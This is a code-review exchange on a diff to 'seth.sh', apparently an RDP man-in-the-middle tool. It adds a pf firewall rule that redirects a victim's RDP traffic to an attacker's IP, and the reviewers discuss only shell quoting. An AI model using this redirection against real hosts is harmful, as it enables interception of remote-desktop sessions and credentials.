seth.sh

```diff
@@ -66,71 +114,137 @@ set_iptables_2 () {
         -j REJECT --reject-with tcp-reset
 }
 
+# Define function to add/remove pf rules on the fly for RDP routing and NAT
+set_pf_1 () {
+    # This works but is not able to keep the connection up after authentication
+    echo "rdr pass on en7 proto tcp from "$VICTIM_IP" to any port 3389 -> "$ATTACKER_IP" port 3389" >> $PF_TMP_FILE
```

Comment:
Just a minor thought here: Are the quotes around the variables necessary? I don't use Darwin but in a POSIX shell they would not be necessary.

Reply:
Not really, just a old habit from me to prevent errors if variables contains white spaces, I'm going to drop those quotes